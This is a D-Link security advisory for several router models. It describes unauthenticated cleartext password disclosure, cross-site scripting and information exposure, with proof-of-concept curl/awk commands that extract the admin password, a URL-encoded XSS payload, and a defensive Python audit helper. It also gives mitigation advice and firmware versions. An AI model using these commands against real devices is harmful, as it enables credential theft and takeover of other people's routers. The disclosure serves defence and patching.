Overview
The DIR-652 / DIR-835 / DIR-855L / DGL-5500 / DHP-1565 contain flaws that allow access to the device configuration without logging in and without using the Web-GUI. Using properly formed HTTP requests, the configuration of the running system can be accessed. Configuration data of the running system, including the password, is stored in cleartext, which may allow a malicious user to obtain the log-in credentials. Please follow the instructions in the Recommendations section to fix these reported vulnerabilities.
References
Kyle Lovett - Reported directly to D-Link via dlink.com, April 19, 2014 - Referencing similar vulnerabilities as DAP-1320
- D-Link DAP-1320 Advisory - http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10024
- Author's disclosure on DAP-1320
Description
In order to maintain the author's intent of the disclosure, please reference the original DAP-1320 disclosure at: http://packetstormsecurity.com/files/126219/D-Link-DAP-1320-Directory-Traver
We have also quoted the disclosure from the author, Kyle Lovett, to avoid any misinformation.
Similar to the DAP-1320, the following three cases were found on a variety of platforms.
1) Clear Text Password - CWE - CWE-316: Cleartext Storage of Sensitive Information
DGL-5500A1
DIR-855L
DIR-835
curl -s http://<IP>/tools_admin.asp/ | awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'
DIR-652 -auth
DHP-1565 -auth
curl -s http://<IP>/tools_admin.asp/ -u user: | awk '/hidden/ && /admin_password_tmp/ && /value/ {print $5}'
-----------------------------------------------------------------------------------
2) Cross Site Scripting - CWE - CWE-79: Improper Neutralization of Input
DIR-855L
DIR-835
DHP-1565
http://<IP>/apply.cgi
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
DGL-5500
http://<IP>/apply_sec.cgi
graph_code=X&session_id=123456&login_n=user&login_name=8&action=%3Cbody%3E%3Chtml%3E%3Ch2%3E%3CEMBED%20src%3D%22%3Ctd%20dir%3D%22rtl%22class%3D%22skytext%22width%3D%2277%25%22%3E%3Cmarquee%20%20%20scrollAmount%3D5%20scrollDelay%3D10%20direction%3D%22right%22style%3D%22color%3Ared%3Bfont-weight%3Abold%3B%22%3ESquirrel%20Injection%22%3C%2fh2%3E%3C%2fmarquee%3E%20%3C%2fbody%3E%3C%2fhtml%3E%3C%2ftd%3E%3E&log_pass=&html_response_page=login_pic.asp&tmp_log_pass=&gcode_base64=MTg0MzU%3D
-----------------------------------------------------------------------------------
3) Sensitive Information Disclosure - CWE - CWE-200: Information Exposure
DGL-5500A1
DIR-855L
DIR-835
MSB ELF File MSB EM_MIPS Processor
http://IP/cgi/ssi/
http://<IP>:8080/hnap.cgi
Possibly vulnerable to malicious code
curl -s http://<IP>:8080/HNAP1/
DIR-652 -auth
DHP-1565 -auth
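As an added example (not part of the advisory or the author's disclosure), the following Python audit helper checks the two indicators described above from the defender's side: whether a saved copy of tools_admin.asp still carries the admin_password_tmp hidden field with a value (CWE-316), and whether web-server request lines to apply.cgi / apply_sec.cgi carry an action parameter that decodes to HTML (CWE-79). The HTML snippet and log lines are constructed samples, not captures from a device.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit, parse_qs

# Constructed sample (hypothetical) of an unpatched tools_admin.asp response;
# only the hidden-field shape named in the disclosure is modelled.
SAMPLE_ADMIN_PAGE = """<html><body><form>
<input type="hidden" name="admin_password_tmp" value="placeholder-not-real">
<input type="text" name="admin_name" value="admin">
</form></body></html>"""

# Constructed sample request lines (hypothetical), one per log entry.
SAMPLE_LOG = [
    "GET /tools_admin.asp/ HTTP/1.1",
    "GET /apply.cgi?graph_code=X&session_id=123456&action=%3Cbody%3E%3Ch2%3Ex%3C%2fh2%3E HTTP/1.1",
    "GET /apply_sec.cgi?action=reboot&session_id=1 HTTP/1.1",
    "GET /HNAP1/ HTTP/1.1",
]

class _HiddenFieldParser(HTMLParser):
    """Collects every hidden <input> field name -> value."""
    def __init__(self):
        super().__init__()
        self.hidden = {}
    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "hidden":
            self.hidden[a.get("name", "")] = a.get("value", "")

def exposes_cleartext_password(html):
    """CWE-316 indicator: hidden admin_password_tmp carrying a non-empty value.
    Returns only True/False so the audit never echoes the secret itself."""
    p = _HiddenFieldParser()
    p.feed(html)
    return bool(p.hidden.get("admin_password_tmp"))

# Any opening or closing HTML tag inside the decoded parameter value.
TAG_RE = re.compile(r"<\s*/?\s*[a-z][a-z0-9]*", re.I)

def flag_xss_requests(log_lines):
    """CWE-79 indicator: apply.cgi / apply_sec.cgi requests whose 'action'
    parameter decodes to a string containing an HTML tag."""
    hits = []
    for line in log_lines:
        parts = line.split()
        if len(parts) < 2:
            continue
        url = urlsplit(parts[1])
        if url.path not in ("/apply.cgi", "/apply_sec.cgi"):
            continue
        # parse_qs percent-decodes, so %3Cbody%3E becomes <body>
        if any(TAG_RE.search(v) for v in parse_qs(url.query).get("action", [])):
            hits.append(line)
    return hits
```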
Recommendations
All devices on your network should have log-in credentials, and if your network has WiFi, please make sure WiFi encryption keys are enabled. Also, for devices that cannot notify the owner of a new software update, check for updates from the device's manufacturer.
Immediately update to the fixed firmware referenced in the table below as it is made available. Please continue to monitor this page for further updates and disclosures.
D-Link recommends that the remote network management feature of your D-Link router be disabled (the factory default is disabled) to mitigate a malicious remote user exploiting your router through this vulnerability. If remote network management is disabled, a malicious user would need to be on the local network side of the router, or to have compromised another device on the network that could be used to attack the router.
D-Link recommends that all PCs (Windows or Mac) are up to date and scanned for viruses, bots, or other damaging software that could compromise the network to which they are connected.
WiFi encryption reduces the risk of this vulnerability if the device Web-GUI is accessed over WiFi. If the WiFi network is encrypted, the malicious user would also need to compromise the WiFi encryption, or the PC using the Web-GUI, in order to monitor the traffic and intercept the cookie.
The default configuration of D-Link's routers is designed to provide simple installation, ease of use, and the widest interoperability. D-Link Systems (D-Link US) reminds customers to configure their devices specifically for the security concerns within their network infrastructure. In general, D-Link Systems (D-Link US) recommends disabling services that are not being used, changing/securing device log-in credentials, enabling WiFi encryption, monitoring the router's log files, and using access-lists for your devices so that security risks for your entire network are minimized.
Affected Product
Model Name | HW Version | Current FW Version | New FW Version for this exploit fix
DIR-652 | Ax/Bx | Ax: 1.06b05 and older; Bx: 2.0x and older | FW: Under Development (Updated 08/11/2014)
DIR-835 | Ax | v. 1.04b04 and older | FW: Under Development (Updated 08/11/2014)
DIR-855L | Ax | v 1.02b08 and older | FW: 1.03b01 (Release Notes)
DGL-5500 | Ax | v 1.12b02 and older | FW: Under Development (Updated 08/11/2014)
DHP-1565 | Ax | v 1.01 and older | FW: Under Development (Updated 08/11/2014)
Security patch for your D-Link Devices
These firmware updates address the security vulnerabilities in the affected D-Link devices. D-Link will update this page continually, and we strongly recommend that all users install the relevant updates.
As there are different hardware revisions of our products, please check the revision on your device before downloading the corresponding firmware update. The hardware revision information can usually be found on the product label on the underside of the product, next to the serial number. Alternatively, it can also be found in the device's web configuration.